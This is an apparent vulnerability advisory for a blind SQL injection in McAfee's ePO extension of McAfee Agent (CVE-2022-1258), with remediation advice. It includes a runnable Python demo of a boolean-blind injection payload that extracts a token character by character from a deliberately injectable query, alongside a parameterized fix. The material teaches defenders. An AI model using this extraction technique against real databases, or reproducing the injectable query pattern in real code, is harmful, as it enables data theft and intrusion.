PT-2022-3654 · McAfee · ePolicy Orchestrator (ePO) extension of MA (McAfee Agent)

Published

2022-04-12

·

Updated

2023-11-15

·

CVE-2022-1258

CVSS v2.0

9.0

High

Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions: ePolicy Orchestrator (ePO) extension of MA (McAfee Agent), versions prior to 5.7.6
Description: A blind SQL injection issue exists in the ePolicy Orchestrator (ePO) extension of MA, caused by a failure to neutralize special elements in user-supplied input before that input is used in SQL queries. An authenticated ePO administrator can exploit it to run arbitrary SQL statements against the back-end database. Because the injection is blind, query results are not returned to the attacker directly; they are inferred from differences in the application's response or response time, typically one bit or one character per request. Depending on the privileges of the database account ePO uses, arbitrary SQL can in turn lead to command execution on the server.
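The vulnerability class described above, boolean-blind SQL injection, as an added illustration that is not ePO's or McAfee's code: a lookup that only reports whether a row matched is turned into a yes/no oracle and used to read a hidden column one character at a time, while the same lookup with a bound parameter treats the payload as plain data. The table, column and function names are hypothetical, the data is constructed, and SQLite stands in for the real back-end database so the example runs offline.

```python
"""Constructed example of boolean-blind SQL injection and its parameterized fix.
Not McAfee ePO / McAfee Agent code: the agents table, api_token column and all
function names are hypothetical, and SQLite replaces the real back-end database.
"""
import sqlite3

# Constructed sample data: one hidden value the attacker wants to read.
SECRET = "s3cr3t-token"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE agents (id INTEGER PRIMARY KEY, name TEXT, api_token TEXT)"
    )
    conn.execute("INSERT INTO agents (name, api_token) VALUES (?, ?)", ("host-01", SECRET))
    conn.execute("INSERT INTO agents (name, api_token) VALUES (?, ?)", ("host-02", "other-token"))
    conn.commit()
    return conn


def agent_exists_vulnerable(conn, name):
    """Blind oracle: the caller learns only whether some row matched.
    The caller-supplied name is spliced into the SQL text, so a quote closes the
    string literal and anything after it is parsed as SQL, not as data."""
    sql = f"SELECT 1 FROM agents WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def agent_exists_fixed(conn, name):
    """Same lookup with a bound parameter: the value travels separately from the
    query text, so quotes and operators inside `name` cannot alter the query."""
    row = conn.execute("SELECT 1 FROM agents WHERE name = ?", (name,)).fetchone()
    return row is not None


def extract_token_blind(oracle, conn, target_name, max_len=32):
    """Recover api_token one character at a time using only yes/no answers.
    Each probe asks the database: does the token have character c at position pos?
    (SQLite's substr is 1-indexed; the trailing '-- ' comments out the original
    closing quote.)"""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in alphabet:
            payload = f"{target_name}' AND substr(api_token,{pos},1)='{c}' -- "
            if oracle(conn, payload):
                recovered += c
                break
        else:
            # No candidate matched at this position: end of the token reached
            # (or, against the fixed oracle, the payload was never interpreted).
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle leaks:", repr(extract_token_blind(agent_exists_vulnerable, db, "host-01")))
    print("fixed oracle leaks:    ", repr(extract_token_blind(agent_exists_fixed, db, "host-01")))
```

Against the vulnerable oracle the loop recovers the full token with at most 37 requests per character, which is why "blind" does not mean "harmless". Against the parameterized version every probe is just a name that matches no row, so nothing is recovered. The same parameter binding is the fix for any driver and database; the further step of keeping the application's database account unprivileged is what stops a successful injection from becoming command execution on the server.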
Recommendations: For versions prior to 5.7.6, update to version 5.7.6 or later. Until the update is applied, reduce exposure: exploitation requires an authenticated ePO administrator, so keep the number of ePO administrator accounts to a minimum, restrict network access to the ePO console to trusted management hosts, and run the ePO database account with the least privilege the product needs, so that arbitrary SQL does not readily become operating-system command execution on the server. Review ePO audit logs and database logs for unusual query activity from administrator sessions.

Weakness Enumeration

SQL injection (CWE-89)

Weakness Enumeration

Related Identifiers

BDU:2022-04439
CVE-2022-1258

Affected Products

ePolicy Orchestrator (ePO) extension of MA (McAfee Agent)